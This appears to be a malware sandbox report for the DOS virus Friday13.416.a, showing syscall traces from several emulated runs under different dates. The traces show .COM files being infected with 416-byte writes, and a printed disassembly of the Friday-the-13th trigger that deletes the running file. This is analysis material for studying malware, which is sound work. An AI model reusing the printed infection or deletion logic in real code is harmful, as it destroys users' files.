Sample viewer

vx.netlux.org/Virus.DOS.Friday13.416.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:59:53.578238133Z 26 PC: 12adf | Set disk transfer address
2018-12-17T22:59:53.580422761Z 78 PC: 12ae8 | Find first file
2018-12-17T22:59:53.586883589Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:59:53.593811833Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:53.600825463Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:59:53.603273649Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:59:53.605164456Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:53.608292409Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:59:53.611217281Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-17T22:59:53.626969213Z 62 PC: 12ba8 | Close file
2018-12-17T22:59:53.635986904Z 79 PC: 12af1 | Find next file
2018-12-17T22:59:53.639976557Z 61 PC: 12b21 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:59:53.647118299Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:53.654025259Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:59:53.656825729Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:59:53.658782115Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:53.66186836Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:59:53.664517105Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-17T22:59:53.667349995Z 62 PC: 12ba8 | Close file
2018-12-17T22:59:53.675426466Z 79 PC: 12af1 | Find next file
2018-12-17T22:59:53.678664995Z 61 PC: 12b21 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:59:53.685413097Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:53.691680707Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:59:53.693084687Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:59:53.695738757Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:53.700043618Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:59:53.70172474Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-17T22:59:53.704965635Z 62 PC: 12ba8 | Close file
2018-12-17T22:59:53.71314482Z 79 PC: 12af1 | Find next file
2018-12-17T22:59:53.716072236Z 61 PC: 12b21 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:59:53.723312155Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:53.729839632Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:59:53.731310508Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:59:53.733640494Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:53.736299095Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:59:53.738132889Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-17T22:59:53.742305232Z 62 PC: 12ba8 | Close file
2018-12-17T22:59:53.750607473Z 79 PC: 12af1 | Find next file
2018-12-17T22:59:53.753254245Z 61 PC: 12b21 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:59:53.760342621Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:53.766516699Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:59:53.767899104Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:59:53.769902335Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:53.772441064Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:59:53.773783535Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-17T22:59:53.777388479Z 62 PC: 12ba8 | Close file
2018-12-17T22:59:53.785604974Z 79 PC: 12af1 | Find next file
2018-12-17T22:59:53.788240327Z 61 PC: 12b21 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:59:53.796023939Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:53.80240934Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:59:53.803977982Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:59:53.805610274Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:53.808568617Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:59:53.810069231Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-17T22:59:53.813925008Z 62 PC: 12ba8 | Close file
2018-12-17T22:59:53.822721291Z 79 PC: 12af1 | Find next file
2018-12-17T22:59:53.825454243Z 61 PC: 12b21 | Open file (Filename = 'PAH.COM')
2018-12-17T22:59:53.8318925Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:53.838781491Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:59:53.840406694Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:59:53.841979822Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:53.845341874Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:59:53.846905959Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-17T22:59:53.849711459Z 62 PC: 12ba8 | Close file
2018-12-17T22:59:53.858438363Z 79 PC: 12af1 | Find next file
2018-12-17T22:59:53.861285267Z 61 PC: 12b21 | Open file (Filename = 'TEST.COM')
2018-12-17T22:59:53.867973604Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:53.871514433Z 66 PC: 12b5d | Move file pointer
2018-12-17T22:59:53.872875507Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:59:53.874168526Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:53.877205144Z 66 PC: 12b8b | Move file pointer
2018-12-17T22:59:53.878538562Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-17T22:59:53.886518364Z 62 PC: 12ba8 | Close file
2018-12-17T22:59:53.895274373Z 79 PC: 12af1 | Find next file
2018-12-17T22:59:53.897617352Z 26 PC: 12aff | Set disk transfer address
2018-12-17T22:59:53.898662366Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 0xd
0x12bb3: jne 0x12bd7
0x12bb5: cmp al, 5
0x12bb7: jne 0x12bd7
0x12bb9: xor ax, ax
0x12bbb: mov cx, 0x7fff
0x12bbe: xor di, di
0x12bc0: mov es, word ptr es:[0x2c]
0x12bc5: cld
0x12bc6: repne scasd eax, dword ptr es:[di]
0x12bc8: jne 0x12bd7
0x12bca: add di, 2
0x12bcd: push ds
0x12bce: push es
0x12bcf: pop ds
0x12bd0: mov ah, 0x41
0x12bd2: mov dx, di
0x12bd4: int 0x21
0x12bd6: pop ds
0x12bd7: pop es
2018-12-17T22:59:53.901855804Z 0 PC: 12a44 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13372,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:08.590325488Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:38:08.591784664Z 78 PC: 12ae8 | Find first file
2018-12-25T12:38:08.597510821Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:08.603754477Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:38:08.610325661Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:38:08.61154317Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:38:08.612683817Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:38:08.615532893Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:38:08.616803869Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-25T12:38:08.63014787Z 62 PC: 12ba8 | Close file
2018-12-25T12:38:08.647265949Z 79 PC: 12af1 | Find next file
2018-12-25T12:38:08.650094271Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.656782844Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.663251495Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.665639475Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.667216338Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.669988233Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.671776193Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.674296063Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.682074391Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.686665315Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.695988171Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.702472392Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.704055934Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.705634312Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.708345478Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.710853964Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.713450768Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.721060488Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.72379642Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.730346301Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.736395321Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.737859119Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.739339389Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.74172729Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.743066715Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.74582547Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.753432737Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.756125017Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.762922979Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.76945488Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.771039847Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.772782615Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.775612986Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.776813395Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.779551897Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.788556487Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.790916418Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.79743756Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.803437073Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.804530645Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.806583187Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.809017945Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.810098953Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.813848434Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.821968121Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.824752915Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.831742316Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.838354268Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.839702873Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.841566501Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.844100875Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.845279306Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.848472657Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.855868224Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.85829407Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.864954878Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.867565995Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.868876603Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.870512289Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.872842454Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.873995363Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.882021276Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.890020294Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.892208605Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:38:08.894229866Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 0xd
0x12bb3: jne 0x12bd7
0x12bb5: cmp al, 5
0x12bb7: jne 0x12bd7
0x12bb9: xor ax, ax
0x12bbb: mov cx, 0x7fff
0x12bbe: xor di, di
0x12bc0: mov es, word ptr es:[0x2c]
0x12bc5: cld
0x12bc6: repne scasd eax, dword ptr es:[di]
0x12bc8: jne 0x12bd7
0x12bca: add di, 2
0x12bcd: push ds
0x12bce: push es
0x12bcf: pop ds
0x12bd0: mov ah, 0x41
0x12bd2: mov dx, di
0x12bd4: int 0x21
0x12bd6: pop ds
0x12bd7: pop es
2018-12-25T12:38:08.896309698Z 0 PC: 12a44 | Program terminate

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13372,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:08.748446511Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:38:08.750400082Z 78 PC: 12ae8 | Find first file
2018-12-25T12:38:08.756474042Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:08.763129963Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:38:08.769620008Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:38:08.770951021Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:38:08.772378086Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:38:08.774967245Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:38:08.77626797Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-25T12:38:08.789552736Z 62 PC: 12ba8 | Close file
2018-12-25T12:38:08.797504145Z 79 PC: 12af1 | Find next file
2018-12-25T12:38:08.800678097Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.807466845Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.813526847Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.815988879Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.817552442Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.820041373Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.821859175Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.824807011Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.832264456Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.8354518Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.84166597Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.84776624Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.84953655Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.850723793Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.853148822Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.854693994Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.857234018Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.864790431Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.868141878Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.886684654Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.892828556Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.894573149Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.895898632Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.898243931Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.899658169Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.902195451Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.90968054Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.913264055Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.9180102Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.922041182Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.923522639Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.924554651Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.926316504Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.927443653Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.929401586Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.935134912Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.937672942Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.942066818Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.946530742Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.947624905Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.949167286Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.951043725Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.952495794Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.955917869Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.961505321Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.963371033Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.967914583Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:08.97181306Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:08.972868824Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:08.974443847Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:08.976760003Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:08.977921419Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:08.981074222Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:08.988405618Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:08.990807389Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:08.998157138Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.000454151Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.001572879Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.00335082Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.00580215Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.006983156Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.015479399Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.023424188Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.0257813Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:38:09.028536374Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 0xd
0x12bb3: jne 0x12bd7
0x12bb5: cmp al, 5
0x12bb7: jne 0x12bd7
0x12bb9: xor ax, ax
0x12bbb: mov cx, 0x7fff
0x12bbe: xor di, di
0x12bc0: mov es, word ptr es:[0x2c]
0x12bc5: cld
0x12bc6: repne scasd eax, dword ptr es:[di]
0x12bc8: jne 0x12bd7
0x12bca: add di, 2
0x12bcd: push ds
0x12bce: push es
0x12bcf: pop ds
0x12bd0: mov ah, 0x41
0x12bd2: mov dx, di
0x12bd4: int 0x21
0x12bd6: pop ds
0x12bd7: pop es
2018-12-25T12:38:09.030871357Z 0 PC: 12a44 | Program terminate

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13372,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:09.195977219Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:38:09.197453767Z 78 PC: 12ae8 | Find first file
2018-12-25T12:38:09.203670549Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:09.210373079Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:38:09.218544339Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:38:09.220090358Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:38:09.221420833Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:38:09.224034531Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:38:09.226470499Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-25T12:38:09.241158188Z 62 PC: 12ba8 | Close file
2018-12-25T12:38:09.249388117Z 79 PC: 12af1 | Find next file
2018-12-25T12:38:09.252679855Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.259193087Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.265419505Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.267937223Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.269293937Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.271971323Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.274635329Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.277326979Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.284908554Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.287926895Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.295332466Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.301648328Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.303175008Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.305202329Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.307995958Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.309510395Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.313291172Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.321022223Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.323810528Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.332800873Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.340603129Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.34204739Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.343992447Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.34705686Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.348810739Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.352316308Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.36120722Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.364162044Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.371587777Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.37782788Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.37920948Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.38163896Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.384503525Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.386146224Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.389065959Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.397685307Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.40513971Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.411960805Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.418962892Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.420636806Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.428841274Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.432961824Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.434624123Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.438623573Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.44753694Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.45035407Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.456775744Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.463766607Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.465397347Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.466933941Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.470147183Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.471649443Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.474589064Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.483405892Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.486068913Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.492224569Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.497763384Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.499023575Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.49987207Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.501860431Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.502816914Z 64 PC: 12b97 | Write file or device (See above)
2018-12-25T12:38:09.509132181Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T12:38:09.517932638Z 79 PC: 12af1 | Find next file (See above)
2018-12-25T12:38:09.521271886Z 26 PC: 12aff | Set disk transfer address
2018-12-25T12:38:09.522269408Z 42 PC: 12bb0 | Get date 0x12bb0: cmp dl, 0xd
0x12bb3: jne 0x12bd7
0x12bb5: cmp al, 5
0x12bb7: jne 0x12bd7
0x12bb9: xor ax, ax
0x12bbb: mov cx, 0x7fff
0x12bbe: xor di, di
0x12bc0: mov es, word ptr es:[0x2c]
0x12bc5: cld
0x12bc6: repne scasd eax, dword ptr es:[di]
0x12bc8: jne 0x12bd7
0x12bca: add di, 2
0x12bcd: push ds
0x12bce: push es
0x12bcf: pop ds
0x12bd0: mov ah, 0x41
0x12bd2: mov dx, di
0x12bd4: int 0x21
0x12bd6: pop ds
0x12bd7: pop es
2018-12-25T12:38:09.525555946Z 65 PC: 12bd6 | Delete file (Filename = 'A:\TEST.COM')
2018-12-25T12:38:09.536153161Z 0 PC: 12a44 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13372,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:09.255850218Z 26 PC: 12adf | Set disk transfer address
2018-12-25T12:38:09.256917779Z 78 PC: 12ae8 | Find first file
2018-12-25T12:38:09.265327072Z 61 PC: 12b21 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:09.272645011Z 63 PC: 12b3a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:38:09.279646078Z 66 PC: 12b5d | Move file pointer
2018-12-25T12:38:09.281991897Z 66 PC: 12b72 | Move file pointer
2018-12-25T12:38:09.283845609Z 64 PC: 12b7e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:38:09.286264993Z 66 PC: 12b8b | Move file pointer
2018-12-25T12:38:09.289220925Z 64 PC: 12b97 | Write file or device (Write 416 bytes on handle 5)
2018-12-25T12:38:09.304632849Z 62 PC: 12ba8 | Close file
2018-12-25T12:38:09.313457518Z 79 PC: 12af1 | Find next file
2018-12-25T12:38:09.317267868Z 61 PC: 12b21 | Open file (See above)
2018-12-25T12:38:09.324547683Z 63 PC: 12b3a | Read file or device (See above)
2018-12-25T12:38:09.33164844Z 66 PC: 12b5d | Move file pointer (See above)
2018-12-25T12:38:09.333954592Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T12:38:09.33568446Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T12:38:09.338519664Z 66 PC: 12b8b | Move file pointer (See above)
2018-12-25T12:38:09.339949554Z 64 PC: 12b97 | Write file or device (See above)
